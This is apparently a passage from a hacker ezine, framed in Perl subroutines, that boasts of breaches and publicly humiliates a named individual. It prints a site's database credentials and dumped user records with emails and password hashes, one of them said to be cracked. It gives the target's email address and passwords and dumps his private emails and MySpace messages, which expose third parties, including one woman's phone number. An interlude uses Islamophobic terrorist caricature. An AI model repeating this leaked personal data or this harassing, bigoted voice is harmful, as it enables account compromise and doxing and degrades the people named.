/home/virtual/site177/fst/var/www/html/wp-config.php // ** MySQL settings ** // define('DB_NAME', 'clpwn1'); // The name of the database define('DB_USER', 'clpwn'); // Your MySQL username define('DB_PASSWORD', 'p4ssw0rd'); // ...and password ##ELEEEEET define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value Lets check out some databases :p LOCK TABLES `jos_users` WRITE; /*!40000 ALTER TABLE `jos_users` DISABLE KEYS */; INSERT INTO `jos_users` VALUES (62,'Administrator','admin','bhs@blackhatscan.com','f0d5299cdda6b67fa0e98a 4000c823b0','Super Administrator',0,1,25,'2007-08-02 12:11:48','0000-00-00 00:00:00','',''); /*!40000 ALTER TABLE `jos_users` ENABLE KEYS */; UNLOCK TABLES; /*!40000 ALTER TABLE `wp1_users` DISABLE KEYS */; INSERT INTO `wp1_users` VALUES (1,'admin','dae5b0305ece675094ca81b97078855b','admin','clpwnblog@clpwn.com ','http://clpwn.com','2007-07-08 20:22:58','',0,'clpwn'); /*!40000 ALTER TABLE `wp1_users` ENABLE KEYS */; UNLOCK TABLES; INSERT INTO `wp_users` VALUES (1,'cadmin','2a9d119df47ff993b662a8ef36f9ea20','admin','dropstatd@gmail.co m','','2007-08-12 06 :55:07','',0,'team clpwn'),(2,'bpzp','c62d929e7b7e7b6165923a5dfc60cb56','bpzp','bpzp@clpwn.co m','http://clpwn.com','2007-08-12 12:54:07','',0,'bpzp'); LOL THAT MD5 = p4ssw0rd LOL I'll keep this short and sweet, CLPWN, stop releasing shit. Keep your xss warez to yourselves, because in the words of John Bambenek "you are boring us". EOCLPWN );} sub Interlude { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOINTERLUDE' My compliments; you have completed about half of the content. That is, unless you just skipped ahead, in which case you can screw off. You might want to get some sleep before delving into the next half. Or at least get some food and take a shit. Entertain yourselves with some hacker trading cards. [CUT_HERE] Phate 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle(s): Phate, Phate 89 | Affiliations: EnigmaGroup, BHF | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: N0ne. Th1z k1d iz tHe deph1Nit10n of l33ch | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: N0ne. H3 kann0t h4q. H0w3v3r, h3 k4n c4lL uP | |> h1z t3rr0riz7 uNcl3 t0 kr4sh an a1rpLaNe int0 j00r h0uz3 | |> PHJ33R!!@#!#@$#!#$!!@#!#!@!#$!@!$!one!!1on3111 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: "Allah Ackbar!!" | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: He'z a musl1m w4nNa-b33 h4qr, 4nD w4nna-b33 | |> t3rr0r1zt. h3 l00kz lyk3 4 t3rr0riZt th0ugH | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ___________ | + / \ <- gh3Y tUrb4N + | / \ | + \ / + | \___________/ | + | . . | <- L1ttl3 eyez th4t ar3 + | | ,, | k0nc34led by h1z f4t. | + |, ,,,, ,| + | ,,,,,,,,,,,, | + ,,,,,,,,,, + | ,,,,,,,, <- bu5hY 4ss 73Rr0rist | + ,,,,,, b34rd + | ,,,, | + ,, + | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] Phate [CUT_HERE] psychomarine 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle(s): psychomarine, psycho | Affiliations: EnigmaGroup, EGU | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: H4z h4xed HBH many timez, haz h4qrd | |> Locus7s m4ny tim3z, th1z man iz n0t t0 b3 fuq3d w1th. | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: h3 k4n c0m3 to y0ur houze and b34t you up | |> 1n r34l liph3, th1z m4n iz d4ng3r0uz. | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: "well trust me, anyone on this server, i guarentee | |> you, cant hold a candle next to me, and my teams skills, so | |> nothing will go down without them losing, and they know it" | |> (s4id b3ph0re g3tting 0wn3d ph0r ZF0-2) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: A ph0rmer US M4r1n3 (phj34r!!@#$!), h3'z | |> 0bviously 4ble to b3at y0u uP IRL | |> h3 woUlD lyk3 t0 h4q y0ur b0x, bu7 he haz n0 w4reZ/0d4yz. | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | uNf0rtuN4tlY w3 w3r3 n4wt | + 4bL3 t0 g3t a p1c 0f th3 + | MucH ph33rd pSyk0m4r1ne h3 | + w4z t00 w3ll h1dD3n w1th h1z + | m4r1ne konc34lm3n7 sk1llz | + + | | + + | | + + | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] psychomarine Now on with the show! EOINTERLUDE );} sub Mil { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOMIL' Allow me to detail to you a story about a boy named Julian, aka Milamber, aka Mil. Julian decided to play the hacker game on the internet and make lots of hacker friends. He just had one problem: Julian lacked talent of his own. This made him a cheap and often annoying hanger-on. However, the internet tolerated little Julian, because of his common drunken evenings on IRC, which, if often annoying, at least gave him the image of a bumbling and likable drunk. "No skillz just illz" Since sometime well before we published our first ezine we have had many password hashes, and among those we had a hash belonging to Mil. This hash was formed from the password "lightning". This is an embarrassing and stupid password and in all ways is rather insufficient. We could choose any method to find the source of that hash. I just...I just cannot get over how stupid that password was. But Mil gets dumber! See, when we published our first ezine, we included that hash among many others. In fact, it was included thrice. Further, we made specific reference to Mil and to his father (information meant to signal that we had read through his emails). I did not consider this very subtle. Mil did not change his password. Not only did we have access to his emails and online accounts, but whoever else cared to also did. We publicly humiliated Mil, and it went right over his ignorant head. Here are a few lessons to learn from this episode: 1. When an ezine comes out and shocks the scene, check for your presence in it. We have devised an elite command for you to use just for this purpose: grep -i 'mil[amber| ]' ezine.txt To use this please open a terminal (if you don't know how please ask on IRC) and type that. But if ezine.txt is not in the current directory that won't work quite right! With a bit of asking on IRC I am sure you can figure it out. If you find yourself in an ezine, ask yourself if the released information could in any way decrease your security. 2. Do not use passwords like "lightning". Seriously, welcome to the internet. You fucking noob. 3. Stay away from hacker forums. These could become the targets of real hackers, and you could be collateral damage. Mil has learned, to some degree, some of these lessons. At some point Mil must have realised that people were reading his emails (I would have thought the zine would have made it fucking obvious!) and he changed his password. Now he uses something really elite, compilations like "U3wc1g9arARR". Passwords like that must make Mil feel HACKER-PROOF. Additionally, Mil deleted some of his most embarrassing emails, which we cannot bring to you here. My favourite was when he poured his heart out to some emo bint (was that "suicidalbutterfly" or one of the others?) and got harshly rejected. So, as you have probably guessed by now (but this may be a shock to little Julian!) we hacked him again. So, let's get into our sequel. Mil doesn't really do anything on the internet. In his milamber.1@gmail.com account he mostly sent out emails along the lines of cuntrash.txt (see below). Something else that we can only call "interesting" can be seen at derision.txt below. His inbox is flooded with Myspace messages (still...). He is most easily classified as a Myspace whore. The entire point of his online existence is to try to pick up girls on Myspace. To see an example of him chatting with an old skank (*you* didn't have to see her picture. Well, maybe you have. Who knows who else has owned Mil?), check out yumi.txt. However, mostly his messages are to or from a lady named Cassie. Evidently, while not producing anything to speak of, all Mil has done in the last year online is try to get with this girl. And for being a girl that has supposedly had a boyfriend for five years, she sure does flirt back. I think these two should stop fucking around and start fucking around, if you get my meaning (because Mil probably won't :-P). To see some examples of him chatting with Cassie, read flirt.txt, honour.txt, and stud.txt. Any of you that know Mil and have watched him not code, not learn, and not do shit this year, know now that this is what he has been putting his efforts into. Hundreds of messages with Cassie. He even gives her a bit of advice about using teh internets and what it means to try to be hacked! Notice that our simple-minded wanker Julian is easily satisfied with cheese when people are trying to hack him (see hack.txt). Let us hope that he eats grilled cheese when reading this, and maybe he will not mind it so much! We decided to concurrently release this through Mil's Myspace page, because we don't think any hackers (reading our zine) take him seriously anyways. We might as well at least get the message out to the part of Mil's life that matters to him: Myspace girls. This is actually a little harsh by our standards (we are nice hackers!) but we still feel ok considering what other groups might have done in our place. They could lock him out of all these accounts, deface, spam cruel messages about his penis size, rm -rf him, heck, who knows what mischief others would do. If anything, we are too lenient. See, the reason we are doing this is because Julian called us on. Of all the people who tried to be our enemies, Mil did so publicly and obviously. Others were either private or subtle. We don't consider someone an enemy just because they become jokes in our zine. Most of them were jokes to begin with. A lot of it is in good fun. Isn't that outrageous? Of all people, some idiot who has been oblivious to our access to multiple accounts for over a year is the one telling us that our time is up! Mil told us that "redemption is coming". Well Mil, that has been a self-fulfilling prophecy, except it is not happening the way you thought. By the way, Mil never said that HE would even attempt to attack us. It would be his big hacker buddies that would do so. See how this has turned out so far, Julian? No matter how elite your hacker buddies may be, they will not stop you from being a moron and getting yourself owned. Instead, Mil has new lessons to learn. He has finally mastered "do not use 'lightning' as a password", we think, but we feel that we can teach him more advanced lessons like "do not reuse passwords" and "be careful who you accept links from, especially when you are slow on the updating front". Mil, stay away from hackers. If you could have done so without _doing_ anything or saying anything, you would have been OK. But you just cannot stop from tempting us (and probably others who are a bit more silent) from owning you. Just, stay away. Stop pretending to be anything more talented than a mediocre end user. Julian, it is our diagnosis that you are insecure. Do not be dismayed; together we can have a brainstorming session and potentially reach closure on some of your issues. Let's talk about your feelings. Then we can reassess our options bilaterally. But really, until you stop being such a fucking tool, just don't bring yourself to our attention. <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< [cuntrash.txt] X-Gmail-Received: d5716904788974f52b2dbf15f292010f97d5b544 Received: by 10.38.165.4 with HTTP; Tue, 18 Jan 2005 09:22:32 -0800 (PST) Message-ID: Date: Wed, 19 Jan 2005 04:22:32 +1100 From: "Milamber ..." Reply-To: "Milamber ..." To: kurupt3k@coder-underground.com Subject: wh0re Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Delivered-To: milamber.1@gmail.com Cunt rash [/cuntrash.txt] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< [derision.txt] X-Gmail-Received: 19db689c2b1fcf29953798936b7d1b2b22c2f69e Received: by 10.35.130.7 with HTTP; Sat, 8 Apr 2006 23:32:27 -0700 (PDT) Message-ID: Date: Sun, 9 Apr 2006 16:32:27 +1000 From: "Milamber ..." To: arwynies@gmail.com Subject: Derision MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Delivered-To: milamber.1@gmail.com You prepare to shout "h0n0ez!!11!!one" upon joining combat. You prepare to attack Derision who is already hunting Silent Turkan of the = GWA. > You shout: h0n0ez!!11!!one tan Derision is rocked by the bloodcurdling warcry. Hp: 1833 (1833) Gp: 203 (298) Xp: 19806 Your attitude is now neutral. > stab derision Hp: 1833 (1833) Gp: 206 (298) Xp: 19809 A dull red glow appears around Derision. You prepare to stab Derision with one of your short swords. > Hp: 1833 (1833) Gp: 174 (298) Xp: 19995 [Ninjas] Turkan: i need a fucking heal :P g e Holy Serakyo The Mystik appears to be checking out all your wounds. Holy Serakyo The Mystik studies Derision, Holy Serakyo The Mystik, Decora D'Omega, Takeshi, a boring troll and you. Queued command: g e > Hp: 1833 (1833) Gp: 177 (298) Xp: 19998 You start guarding the east exit against everyone. A strange-looking man goes on about cheese dip before wandering up the stre= et. [Ninjas] Takeshi: rofl stab derision Hp: 1833 (1833) Gp: 170 (298) Xp: 20111 You prepare to stab Derision with one of your short swords. > Hp: 1833 (1833) Gp: 138 (298) Xp: 20276 The dull red glow around Derision becomes wobbling orange. You launch a powerful attack. You thrust at Derision with one of your short swords but his magical shielding absorbs all of the blow. The wobbling orange glow around Derision becomes bright red. [Ninjas] Turkan reports that he is near death and clear of mind. Hp: 1833 (1833) Gp: 141 (298) Xp: 20279 The bright red glow around Derision becomes wobbling orange. Hp: 1833 (1833) Gp: 144 (298) Xp: 20282 The wobbling orange glow around Derision becomes flickering yellow. You launch a powerful attack. You thrust at Derision with one of your short swords but his magical shielding absorbs all of the blow. stab derision You prepare to stab Derision with one of your short swords. > Hp: 1833 (1833) Gp: 112 (298) Xp: 20461 Holy Serakyo The Mystik appears to be checking out all your wounds. stab derision Holy Serakyo The Mystik studies Derision, Holy Serakyo The Mystik, Decora D'Omega, Takeshi, a boring troll and you. You prepare to stab Derision with one of your short swords. > Derision pierces your stomach with one of his elegant stilettos. Hp: 1774 (1833) Gp: 80 (298) Xp: 20655 [Ninjas] Takeshi: Derision r die now tbh Hp: 1777 (1833) Gp: 83 (298) Xp: 20658 You launch a powerful attack. You stab Derision deeply in the neck with one of your short swords but his magical shielding absorbs most of the blow. There is a sudden white flash around Derision. Silent Turkan of the GWA arrives from the east. You try to block the exit and stop Derision from leaving east but he manages to elude you. Derision leaves east. | @-@ | This is Brother David's house of rest and safety; a warm and pleasant room with thick walls to block out the sound of the street. The room has been decorated according to the strict methods of Fung Shooey: plump pillows are scattered all over the wooden floor-boards, and the walls have been painted in pale pastels. The overall effect is one of peace. There is one obvious exit: west. Brother David is sitting on a hard wooden stool and Derision, Old Man Mayian and a sad man are standing here. A colourful sash, three half rotten pumpkins, an ice bucket, a business card, an information booklet, a slightly rotten pumpkin and a knife are on the floor. You pursue Derision east. A terrible screeching emanates from Old Man Mayian's jar of screaming mandrake roots. Derision grins. say you suck You say: you suck > Derision appears to be checking out all your wounds. Derision studies Derision, Old Man Mayian, a sad man, Brother David and you= . [Ninjas] Takeshi: lame :9 gs need more block or w/e :P Derision agrees wholeheartedly. [Ninjas] Althius: need more block or w/e :P > You feel very tranquil. Derision waves. Derision leaves the game. [Derision leaves Discworld -- needs no introduction] [/derision.txt] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< [yumi.txt] awesome, well im going out 2moro with some girls 2 darling harbour and probably going for drinks later @ the cross. ur welcome 2 join us. 0405 357 579 > my number. yea, i cant handle this double msging business..haha sweet dreams... p.s grrrrr~ so jealous of u for living in the whitsundays! ur living the life...thata boy! ----------------- Original Message ----------------- From: Jules Date: 18 Apr 2007, 09:24 PM Was living in the whitsundays for awhile at airlie beach ... yes, my character has certainly changed a lot - and still is changing It does! let me know if you can think of anything, heh I've gotta go, got some things I should do before I go to sleep :) Good to hear from you again! night xoxoxx ----------------- Original Message ----------------- From: yumi Date: Apr 18, 2007 11:22 PM u werent in sydney?! where were u then.. see, u were hiding somewhere :p i think my character has changed heaps. tho i dont really know what i was like in primary school. i remember u were pretty quite but a nice guy. i couldnt handle some of the boys but u were quite tolerable~hehe ahh, catch up sounds good... ----------------- Original Message ----------------- From: Jules Date: 18 Apr 2007, 09:12 PM Heh no, I think you've changed a lot Haha I've been around ;P i wish I didn't come back to sydney though! we should catch up sometime maybe! ----------------- Original Message ----------------- From: yumi Date: Apr 18, 2007 11:11 PM hehe, ta~ tho i feel like i look pretty much the same still! if i ran into u in the streets at all, i would have had no idea. usually i can see a glimmer of something i recognise in ppl i havent seen in ages. isnt it bizarre, after 10 yrs we find each other..* where were u hiding jules? hehe.. ----------------- Original Message ----------------- From: Jules Date: 18 Apr 2007, 09:03 PM Haha yeh, well I have changed a lot ;P Usually look a lot different than I do in any of those pictures as well heh yes, you look a lot different as well - all for the better though ;) ----------------- Original Message ----------------- From: yumi Date: Apr 18, 2007 11:01 PM u know, other than ur face shape, u look totally different to how i remember u last.. *all for the better tho ;) ----------------- Original Message ----------------- From: Jules Date: 18 Apr 2007, 08:29 PM hehe :) haha yeh, myspace is good for that ... That's good! Yeh, I'm really good as well...Just started a new job fairly recently doing IT stuff for Zurich! What do you do with yourself? ----------------- Original Message ----------------- From: yumi Date: Apr 18, 2007 1:09 PM hahaha! oh WOW! this is so weird, im finding all these old berowra ppl.. im doing great! how r u? what r u up to? ----------------- Original Message ----------------- From: Jules Date: 18 Apr 2007, 06:48 AM Hey hey ...Yes I did! I remember you...How have you been? ----------------- Original Message ----------------- From: Yumi Date: Apr 17, 2007 1:45 AM did u go to berowra public? [/yumi.txt] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< [flirt.txt] Subject: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: XOX Body: You better not......because i can be quite dangerous :P and yes.....really!!! xox ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 11:53 PM Haha I saw nothing bad about you haha yeh, she scares me, but there's not much she can do except get her b rother to attack me or something, lol oh really?? lol!! ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 11:50 PM Ohhhh strange hey...well i would hate to hear what you say about me then :P ohh poor belinda - poor little love, probably heart broken - watch your back 16yr olds can be evil... whips and sexual outfits hey.......well i could tell you about mine if you like!!.......pft, kidding - obviously haha ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 11:48 PM Haha yeh I'm helping, but it's less physical work now, nore changing settings for certain things etc so i can do it from this computer ... Haha no other girlfriends ;P Only one other person messaging me and they're strange...haha i fucked belinda off ... Was going to let her down gently, but it didn't quite happen that way, so I'm pretty sure her love turned to hate ;P The big german girl is still as scary as ever, telling me about her whips and strange sexual outfits ;P ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 11:43 PM So are you helping at all slacker? or just msging me and all your other GF's hehehe...by the way, how is Belinda (was that her name) and the big German girl hahaha ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 11:35 PM No no no!! haha, I'm honoured by your generous donations, supporting my long road to sobriety!! I really feel like I should be helping more here! everyone seems to be a bit more relaxed now though which is good...everything might even be ready for saturday :o ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 11:32 PM Well if you want to pass up my offer then that is entirely up to you :P ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 11:26 PM Haha ok!! I'm afraid I won't be receiving very much money off you =( Only because 5c per drink isn't very much, of course ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 11:18 PM Ok well I will give you 5c for every fluid substance no matter what it is in that you put down and don’t feed to your liver :P ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 11:10 PM Wait ... lol ... I've already lost out on 35 cents =( BUT I won't be drinking cans when I go to the city =( ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 11:08 PM really? well you guys are getting ripped off! i will send you 5c for every can you put down tonight and dont drink :P now keep a tally and you could be a rich boy by the end of the night ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 11:07 PM Haha this isn't SA, we don't get money for ours anymore =( erm, not that my drinking has gotten to that stage yet...erm yes, of course not! ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 11:04 PM Says he who has to result to collecting cans to feed his alcoholism hahaha ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 11:01 PM haha will do ;P haha well the clothes doesn't really worry me that much ...Got too many as it is :S yeh, the money sucks ... if i wasn't in debt so much and trying to save it would be justifiable ... but as it is, well ... haha damn me and always living in the moment and not thinking of the next day ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 10:58 PM Well you will have to make up for lost time tomorrow and stare long and hard at my lovely pics :P pft hahaha! Ohhhhhh you are such a party animal, I wish I had the energy and friends to party all the time…not to mention the money and the fricken clothes to wear out. ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 10:53 PM haha stop hurting my brain ... It isn't a relief not being able to see you ;P Yes, at gun point as well, I might add!!! Well maybe not quite, i seemed to agree it would be a good idea ... but knowing me, ill be out all night and will be dying tomorrow =.. ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 10:50 PM So it wasn't sarcasm? So its a relief not being able to see me??? heeeeeeeeey! Ohh your friends are dragging you kicking and screaming into town again? i think i need to have a talk to them! ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 10:48 PM Haha oi! Who said it was sarcasm? ;P a GEEK? What!!@##49 ahh fuck think im getting dragged into town tonight ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 10:41 PM Ohhhh so sarcastic and mean! Lucky you are a Geek :P ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 10:39 PM I know, it's such a relief... I mean I'm devastated I can't gaze upon your beauty as I reply to these sweet messages ... Or something ;) ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 10:37 PM No pictures? so you cant see me? :P hehe ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 10:32 PM Shhh ;P Haha it will work ;P you can't believe how confusing it is trying to navigate myspace with no colours or pictures at all lol :S ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 10:30 PM Normal hey :P ok well I will be off then, I will just tell my boss you said I could go and if he has a problem with it he can call you ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 10:26 PM meant full from the bbq ;P but yeh I get bloated off beer as well .... Bbq was nice, LOTS of food ... and geeks! heh they're not too bad actually, some are normal/more like me :o Sure you can! Just walk out ;P ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 10:24 PM Hahaha! Well beer tends to bloat me too! How was the BBQ? And you did not answer my question…..can I please go home early? ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 10:20 PM Oh I can imagine!!!! Haha yes well that's not fair ... I'm stuck here setting up a shitload of computers, and forced to view websites through a text based browser :S But I've got beer, and sooooo full! =) ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 9:22 PM Ohh I am so lonely now? It is such a beautiful day today…although you would not know because you are not here with me ;) can I pleeeeeease go home??? :P ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 8:05 PM haha all right i'll let you off this time ;) no way!!!!!!!!!!! You'd hurt me if i did ;) Hah fuck, i better go anyway ... have fun on myspace!! I'm sure it won't be the same without me!! =( haha, take it easy ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 8:00 PM Nope? Damn it! I got up this morning tho and went ;) are you saying I am fat………heeeeeeeeeeeeeeey! ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 7:55 PM AND i suppose you didn't go to the gym last night? ;P hmmm? ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 7:54 PM well i am eating crackers and chocolate :P shhhh ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 7:49 PM Heh just means they're setting things up but running short on time! 10 more minutes and I might go help them =) haha yeh beer + bbq is sounding good right about now ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 7:46 PM ha...ok i dont know what that means ;) but as long as you know what you are doing! Mmmm Beer and BBQ yum ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 7:35 PM Soon soon! I want to time it so I make it just for the BBQ and beers, which means less setting up for me =D hawkes: is the ctf box done can you tell me what ip addresses you want ey im setting up dns hey hows it all comming together hmm another interview.. cutting it a bit fine Sounds like they're doing well ;P ----------------- Original Message ----------------- From: Cassie Date: Sep 27, 2006 7:29 PM Tut tut tut…get to work slacker! ----------------- Original Message ----------------- From: Jules Date: Sep 27, 2006 7:18 PM For all the things I'm supposed to be doing today! Still at home :S - [/flirt.txt] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< [honour.txt] Subject: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: Wat do you think about me? Body: well i have been with my BF for 5 yrs this xmas and before that was with a guy for 2 years then before that i was in a pointless kid relationship for 3 years...even tho we never really spoke to each other?? very interesting!! so no i haven't ever really been single :P ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 8:21 PM haha yeh, i thrive on those things!! Well as long as you're happy....ive been properly single for ages, had a few brief girlfriends ... Had one long term relationship when i was 16 to about 18, but that's about it ----------------- Original Message ----------------- From: Cassie Date: Nov 29 2006 9:57 AM really! sometimes i feel the opposite....scared i am gonna look back a regret missing things? like independance, travelling, buying a house on my own! own ever really being with 1 person?? i have never been single!! that scares me sometimes!! although other times i think no its worth it i guess if i am happy ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 7:41 PM hehe ;P I mean no, I'm a big tough man with no feelings!! haha ahhh ... single life is fun, but gets sort of boring after awhile ----------------- Original Message ----------------- From: Cassie Date: Nov 29 2006 9:35 AM well that explains alot...you were hurt before so now you dont want to make yourself vulnerable again?? hmmmmmm well dont punish the next girl for what the last one did!! you got thru it last time so you will again if it happens...but it wont!! :P ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 7:32 PM haha good idea ;P Not sure! Just seems to happen a fair bit ... All though it's a reason I rarely have gf's anymore ----------------- Original Message ----------------- From: Cassie Date: Nov 29 2006 9:26 AM well check the yellow pages...i am sure this is a local GF store near you :P hahah why would a girl cheat on you? ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 6:30 PM haha well they're just in between ... i've decided i want a girlfriend now, but it's just hard to find one ... especially one who won't cheat on me ----------------- Original Message ----------------- From: Cassie Date: Nov 29 2006 8:17 AM maybe the fact that you are trying to pick up wasted 26 yr olds?? hahah that could be why it is so haaaaaaaaaard!! ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 6:09 PM I could have, but didn't really feel like it ;P I was so cold to her, and she was really wasted and just wouldn't leave me alone, so i just did it I'm not sure :S I tried messaging her on friday, and then again on saturday, and didn't get any replies ... So she either had no credit, or just didn't want to talk to me...So I think I'll give up, and try and find a new love on Thursday ... Why is it so hard to find a decent girl!!?!?!? ----------------- Original Message ----------------- From: Cassie Date: Nov 29 2006 8:02 AM oh you just had to settle for her did you? you couldn't go without altogether? hmmmm wat about your love interest not to long ago? what happened to that ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 5:59 PM 26...So I had to settle for her friend, who I immensely disliked ----------------- Original Message ----------------- From: Cassie Date: Nov 29 2006 7:50 AM hahah!! how old? ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 5:25 PM haha yeh i know =( I think she was a bit out of my league and age range, but still !!!! ----------------- Original Message ----------------- From: Cassie Date: Nov 29 2006 7:14 AM ohhhhhh wat a tease....flashing around daddys money :P ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 5:10 PM Oh yes I'm out of control!! haha i got knocked back by a rich girl with a porsche =( she seemed keen but i a sked her to come for a walk and she declined! evil women ----------------- Original Message ----------------- From: Cassie Date: Nov 29 2006 7:02 AM you are such a rebel jules ----------------- Original Message ----------------- From: Jules Date: Nov 27 2006 3:12 PM ha ha yeh ;P oops, sort of forgot to come home for 5 or so days !! i thought i wasnt going to do too much this weekend ----------------- Original Message ----------------- From: Cassie Date: Nov 25 2006 11:21 AM Interesting :P ----------------- Original Message ----------------- From: Jules Date: Nov 23 2006 9:21 PM ADELAIDE Oops, I mean words can't even begin to describe my thoughts about you. They just won't do you justice. *grins* ----------------- Bulletin Message ----------------- From: Cassie Date: Nov 25 2006 10:56 AM Describe me in one word.... Just one word. Send it to me and me only. Then re-post this message to your friends and see how many strange things people say about you. This is really fun. Just hit the reply key and send me my one word. Then re-post! Game On!!!! And lets try and keep it clean... :P [/honour.txt] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< [stud.txt] Subject: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: RE: Jules the studd :P Body: Why is she coming over? Up for round two and you have not even decided on the rules yet? Ohhhhh so you slept with her you naughty boy Jules!! Hehehe!! Try not sleeping with her while she is with this other guy, coz then you are the other guy and it makes her look bad – and if he is huge…he could find out and want to hurt you :P heheh poor 